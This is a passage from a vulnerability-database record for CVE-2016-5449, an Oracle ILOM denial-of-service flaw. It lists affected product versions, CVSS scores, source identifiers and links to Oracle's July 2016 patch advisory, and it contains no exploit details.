}, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003877", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, ], trust: 0.6, }, cve: "CVE-2016-5449", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "CVE-2016-5449", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "VHN-94268", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", exploitabilityScore: 3.9, id: "CVE-2016-5449", impactScore: 3.6, integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5449", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5449", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-813", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-94268", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-5449", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect availability via vectors related to Console Redirection. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'HTTP' protocol. The 'Console Redirection' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability", sources: [ { db: "NVD", id: "CVE-2016-5449", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5449", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91986", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003877", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-813", trust: 0.7, }, { db: "VULHUB", id: "VHN-94268", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5449", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, id: "VAR-201607-0656", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94268", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:10:08.084000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: 